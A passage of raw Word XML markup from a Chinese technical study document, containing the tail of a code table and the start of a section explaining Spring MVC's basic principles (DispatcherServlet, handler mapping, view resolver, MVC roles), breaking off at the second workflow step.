            <w:tr w:rsidR="00944ED8" w:rsidRPr="00DD77CA" w:rsidTr="008232D6">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="750" w:type="dxa"/>
                  <w:tcBorders>
                    <w:top w:val="single" w:sz="2" w:space="0" w:color="EEEEEE"/>
                    <w:left w:val="single" w:sz="2" w:space="0" w:color="EEEEEE"/>
                    <w:bottom w:val="single" w:sz="2" w:space="0" w:color="EEEEEE"/>
                    <w:right w:val="single" w:sz="6" w:space="0" w:color="EEEEEE"/>
                  </w:tcBorders>
                  <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                  <w:noWrap/>
                  <w:tcMar>
                    <w:top w:w="0" w:type="dxa"/>
                    <w:left w:w="150" w:type="dxa"/>
                    <w:bottom w:w="0" w:type="dxa"/>
                    <w:right w:w="150" w:type="dxa"/>
                  </w:tcMar>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w:rsidR="00944ED8" w:rsidRPr="00DD77CA" w:rsidRDefault="00944ED8" w:rsidP="008232D6">
                  <w:pPr>
                    <w:spacing w:line="270" w:lineRule="atLeast"/>
                    <w:jc w:val="right"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:color w:val="333333"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                  <w:tcMar>
                    <w:top w:w="0" w:type="dxa"/>
                    <w:left w:w="150" w:type="dxa"/>
                    <w:bottom w:w="0" w:type="dxa"/>
                    <w:right w:w="150" w:type="dxa"/>
                  </w:tcMar>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w:rsidR="00944ED8" w:rsidRPr="00DD77CA" w:rsidRDefault="00944ED8" w:rsidP="008232D6">
                  <w:pPr>
                    <w:spacing w:line="273" w:lineRule="atLeast"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:color w:val="333333"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DD77CA">
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:color w:val="333333"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve">  </w:t>
                  </w:r>
                  <w:r w:rsidRPr="00DD77CA">
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:color w:val="0086B3"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>SIMPLE</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00DD77CA">
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:color w:val="333333"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve">, </w:t>
                  </w:r>
                  <w:r w:rsidRPr="00DD77CA">
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:color w:val="0086B3"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>REUSE</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00DD77CA">
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:color w:val="333333"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve">, </w:t>
                  </w:r>
                  <w:r w:rsidRPr="00DD77CA">
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:color w:val="0086B3"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>BATCH</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00944ED8" w:rsidRPr="00DD77CA" w:rsidTr="008232D6">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="750" w:type="dxa"/>
                  <w:tcBorders>
                    <w:top w:val="single" w:sz="2" w:space="0" w:color="EEEEEE"/>
                    <w:left w:val="single" w:sz="2" w:space="0" w:color="EEEEEE"/>
                    <w:bottom w:val="single" w:sz="2" w:space="0" w:color="EEEEEE"/>
                    <w:right w:val="single" w:sz="6" w:space="0" w:color="EEEEEE"/>
                  </w:tcBorders>
                  <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                  <w:noWrap/>
                  <w:tcMar>
                    <w:top w:w="0" w:type="dxa"/>
                    <w:left w:w="150" w:type="dxa"/>
                    <w:bottom w:w="0" w:type="dxa"/>
                    <w:right w:w="150" w:type="dxa"/>
                  </w:tcMar>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w:rsidR="00944ED8" w:rsidRPr="00DD77CA" w:rsidRDefault="00944ED8" w:rsidP="008232D6">
                  <w:pPr>
                    <w:spacing w:line="270" w:lineRule="atLeast"/>
                    <w:jc w:val="right"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:color w:val="333333"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                  <w:tcMar>
                    <w:top w:w="0" w:type="dxa"/>
                    <w:left w:w="150" w:type="dxa"/>
                    <w:bottom w:w="0" w:type="dxa"/>
                    <w:right w:w="150" w:type="dxa"/>
                  </w:tcMar>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w:rsidR="00944ED8" w:rsidRPr="00DD77CA" w:rsidRDefault="00944ED8" w:rsidP="008232D6">
                  <w:pPr>
                    <w:spacing w:line="273" w:lineRule="atLeast"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:color w:val="333333"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DD77CA">
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:color w:val="333333"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>}</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w:rsidR="00944ED8" w:rsidRDefault="00944ED8" w:rsidP="008232D6"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00944ED8" w:rsidRPr="00F41A4C" w:rsidRDefault="00944ED8" w:rsidP="00387E98">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C57760" w:rsidRPr="00F41A4C" w:rsidRDefault="00743AD8" w:rsidP="00743AD8">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>6.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="00C57760" w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve">  Springmvc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00404678" w:rsidRPr="00F41A4C" w:rsidRDefault="00404678" w:rsidP="00404678">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>6.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">  Springmvc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>基本原理</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00404678" w:rsidRDefault="00404678" w:rsidP="00387E98">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00387E98" w:rsidRPr="00F41A4C" w:rsidRDefault="00A52736" w:rsidP="00387E98">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>(1)  Springmvc</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>是什么</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A52736" w:rsidRPr="00F41A4C" w:rsidRDefault="00EC15F8" w:rsidP="00387E98">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00F02533" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>基于</w:t>
      </w:r>
      <w:r w:rsidR="00F02533" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidR="00F02533" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的实现了</w:t>
      </w:r>
      <w:r w:rsidR="00F02533" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Web MVC</w:t>
      </w:r>
      <w:r w:rsidR="00F02533" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>设计模式的框架</w:t>
      </w:r>
      <w:r w:rsidR="008A0769" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="008A0769" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>MVC</w:t>
      </w:r>
      <w:r w:rsidR="008A0769" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>架构模式</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A5FA4" w:rsidRDefault="00EC15F8" w:rsidP="00387E98">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="007A5FA4" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>前端控制器是</w:t>
      </w:r>
      <w:r w:rsidR="007A5FA4" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>DispatcherServlet</w:t>
      </w:r>
      <w:r w:rsidR="007A5FA4" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
      <w:r w:rsidR="007A5FA4" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>应用控制器其实拆为</w:t>
      </w:r>
      <w:r w:rsidR="007A5FA4" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>处理器映射器</w:t>
      </w:r>
      <w:r w:rsidR="007A5FA4" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(Handler Mapping)</w:t>
      </w:r>
      <w:r w:rsidR="00404678">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="007A5FA4" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>进行处理器管理和</w:t>
      </w:r>
      <w:r w:rsidR="007A5FA4" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>视图解析器</w:t>
      </w:r>
      <w:r w:rsidR="007A5FA4" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(View Resolver)</w:t>
      </w:r>
      <w:r w:rsidR="007A5FA4" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>进行视图管理</w:t>
      </w:r>
      <w:r w:rsidR="00683577">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00683577" w:rsidRPr="00606BB1" w:rsidRDefault="00404678" w:rsidP="00387E98">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00683577" w:rsidRPr="00606BB1">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>视图是用户看到并与之交互的界面。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B4809" w:rsidRPr="00606BB1" w:rsidRDefault="00404678" w:rsidP="00387E98">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="004B4809" w:rsidRPr="00606BB1">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>模型表示企业数据和业务规则。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F7E92" w:rsidRPr="00606BB1" w:rsidRDefault="00404678" w:rsidP="00387E98">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="006F7E92" w:rsidRPr="00606BB1">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>控制器接受用户的输入并调用模型和视图去完成用户的需求</w:t>
      </w:r>
      <w:r w:rsidR="006F7E92" w:rsidRPr="00606BB1">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A5FA4" w:rsidRPr="00F41A4C" w:rsidRDefault="007A5FA4" w:rsidP="00387E98">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DA5126" w:rsidRPr="00494E37" w:rsidRDefault="00A52736" w:rsidP="00387E98">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00404678">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Springmvc</w:t>
      </w:r>
      <w:r w:rsidRPr="00404678">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>的工作原理</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00493BE8" w:rsidRPr="00F41A4C" w:rsidRDefault="00494E37" w:rsidP="00493BE8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00493BE8" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00493BE8" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00746B03" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>客户端请求提交到</w:t>
      </w:r>
      <w:r w:rsidR="00746B03" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>DispatcherServlet</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A1FCF" w:rsidRDefault="00494E37" w:rsidP="00493BE8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00493BE8" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00493BE8" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00746B03" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
